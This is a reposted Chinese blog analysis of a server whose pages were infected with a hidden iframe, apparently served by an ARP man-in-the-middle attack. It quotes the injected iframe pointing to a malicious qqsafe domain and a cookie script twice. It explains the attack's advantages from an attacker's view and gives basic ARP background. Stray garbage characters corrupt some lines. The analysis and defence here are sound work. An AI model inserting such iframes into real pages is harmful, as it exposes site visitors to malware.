?

?? 昨天小站被掛馬了，每次打開都會自動彈出一個對話框，提示正準(zhǔn)備安裝...，然后就消失。查看頁面的源文件會發(fā)現(xiàn)在代碼的最后面被加上了9 ~0 ]* U9 N2 ^
<body>" z% I9 o( h% [" ?' A
<iframe src="http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org" height=50 width=0></iframe>8 y1 d8 M) l% D* @; E
<script language="javascript">9 q+ }/ {- y* U/ z
var expires = new Date();expires.setTime(expires.getTime() + 7*24*60*60*1000);document.cookie="vovo=123456test;expires="+expires.toGMTString();+ X- O8 ~8 `. }
</script>5 T% t??h' P" z
</body>! ~4 d& |??v+ A3 `- O' m' ]1 S
這段代碼。經(jīng)過我和技術(shù)人員的一整天的辛苦查找，終于解決了。最終得出結(jié)論是，服務(wù)器被植入了木馬程序，這樣所在服務(wù)器上的所有站點(diǎn)均被掛馬了，經(jīng)查，結(jié)果跟我們推測的一模一樣，而且中毒情況完全相同。下面是關(guān)于qqsafe病毒、arp網(wǎng)站掛馬的原理剖析，奉獻(xiàn)給需要的網(wǎng)友，希望被掛馬的站長朋友能早日擺脫木馬的困擾：

以下是解決辦法：

不管是訪問服務(wù)器上的任何網(wǎng)頁，就連404的頁面也會在<html>后加入：
<body>
<iframe src="http://786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org" height=50 width=0></iframe>
<script language="javascript">
var expires = new Date();expires.setTime(expires.getTime() + 7*24*60*60*1000);document.cookie="vovo=123456test;expires="+expires.toGMTString();
</script>
</body>?
掛馬的位置在html標(biāo)記左右,上面這段惡意代碼，它會每隔幾秒加入代碼，也就是說在輸出具體的東西之前就被掛了，有時有有時又沒有，不是網(wǎng)頁源代碼問題，也沒有在網(wǎng)頁源代碼中加入惡意代碼，即使重裝服務(wù)器，格式化重分區(qū)過第一個硬盤，放上去網(wǎng)站沒多久一樣再會出現(xiàn)這種情況.


首先就排除了網(wǎng)站被入侵的可能,因為首頁能加在那個位置只能是title的地方,用js控制也不大可能.然后去看了php.ini的設(shè)置也沒有任何的異常,而且這個插入的代碼有的時候出現(xiàn)有的時候不出現(xiàn),說明不是網(wǎng)站的問題了.打開同服務(wù)器的其他網(wǎng)站也有這個情況發(fā)生,而且狀況一一樣.檢查并且搜索掛馬的關(guān)鍵字之后確定不是網(wǎng)站程序的問題.

那么剩下的要么是IIS自己出了問題,要么是網(wǎng)絡(luò)的問題,因為數(shù)據(jù)是處理沒有問題(這個由程序輸出,而且即使是html都會出問題),經(jīng)過一個一個排查,最后基本可以確定就是arp欺騙欺騙數(shù)據(jù)報走向,然后中間人修改一些定義的關(guān)鍵字.因為是網(wǎng)絡(luò)層次有問題(所以重做系統(tǒng)是沒有用的).


目的：通過arp欺騙來直接掛馬

優(yōu)點(diǎn):可以直接通過arp欺騙來掛馬.
通常的arp欺騙的攻擊方式是在同一vlan下,控制一臺主機(jī)來監(jiān)聽密碼,或者結(jié)合ssh中間人攻擊來監(jiān)聽ssh1的密碼
但這樣存在局限性:1.管理員經(jīng)常不登陸,那么要很久才能監(jiān)聽到密碼
2.目標(biāo)主機(jī)只開放了80端口,和一個管理端口,且80上只有靜態(tài)頁面,那么很難利用.而管理端口,如果是3389終端,或者是ssh2,那么非常難監(jiān)聽到密碼.

優(yōu)點(diǎn):1.可以不用獲得目標(biāo)主機(jī)的權(quán)限就可以直接在上面掛馬
2.非常隱蔽,不改動任何目標(biāo)主機(jī)的頁面或者是配置,在網(wǎng)絡(luò)傳輸?shù)倪^程中間直接插入掛馬的語句.
3.可以最大化的利用arp欺騙,從而只要獲取一臺同一vlan下主機(jī)的控制權(quán),就可以最大化戰(zhàn)果.


原理：arp中間人攻擊，實際上相當(dāng)于做了一次代理。

正常時候:?A---->B?,A是訪問的正常客戶,B是要攻擊的服務(wù)器,C是被我們控制的主機(jī)
arp中間人攻擊時候:?A---->C---->B
B---->C---->A
實際上,C在這里做了一次代理的作用

那么HTTP請求發(fā)過來的時候,C判斷下是哪個客戶端發(fā)過來的包,轉(zhuǎn)發(fā)給B,然后B返回HTTP響應(yīng)的時候,在HTTP響應(yīng)包中,插入一段掛馬的代碼,比如iframe...之類,再將修改過的包返回的正常的客戶A,就起到了一個掛馬的作用.在這個過程中,B是沒有任何感覺的,直接攻擊的是正常的客戶A,如果A是管理員或者是目標(biāo)單位,就直接掛上馬了.

什么是ARP？

英文原義：Address?Resolution?Protocol?

中文釋義：（RFC-826）地址解析協(xié)議?

局域網(wǎng)中，網(wǎng)絡(luò)中實際傳輸?shù)氖恰皫?#xff0c;幀里面是有目標(biāo)主機(jī)的MAC地址的。所謂“地址解析”就是主機(jī)在發(fā)送幀前將目標(biāo)IP地址轉(zhuǎn)換成目標(biāo)MAC地址的過程。ARP協(xié)議的基本功能就是通過目標(biāo)設(shè)備的IP地址，查詢目標(biāo)設(shè)備的MAC地址以保證通信的順利進(jìn)行。?


注解：簡單地說，ARP協(xié)議主要負(fù)責(zé)將局域網(wǎng)中的32為IP地址轉(zhuǎn)換為對應(yīng)的48位物理地址，即網(wǎng)卡的MAC地址，比如IP地址為192.168.0.1網(wǎng)卡MAC地址為00-03-0F-FD-1D-2B。整個轉(zhuǎn)換過程是一臺主機(jī)先向目標(biāo)主機(jī)發(fā)送包含IP地址信息的廣播數(shù)據(jù)包，即ARP請求，然后目標(biāo)主機(jī)向該主機(jī)發(fā)送一個含有IP地址和MAC地址數(shù)據(jù)包，通過MAC地址兩個主機(jī)就可以實現(xiàn)數(shù)據(jù)傳輸了。?


應(yīng)用：在安裝了以太網(wǎng)網(wǎng)絡(luò)適配器的計算機(jī)中都有專門的ARP緩存，包含一個或多個表，用于保存IP地址以及經(jīng)過解析的MAC地址。在Windows中要查看或者修改ARP緩存中的信息，可以使用arp命令來完成，比如在Windows?XP的命令提示符窗口中鍵入“arp?-a”或“arp?-g”可以查看ARP緩存中的內(nèi)容；鍵入“arp?-d?IPaddress”表示刪除指定的IP地址項（IPaddress表示IP地址）。arp命令的其他用法可以鍵入“arp?/?”查看到。

?

摘自：木木家園

總結(jié)

以上是生活随笔為你收集整理的qqsafe病毒 arp网站挂马 原理剖析-786ts.qqsafe-qqservicesyydswfhuw8ysjftwf.org(转载)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。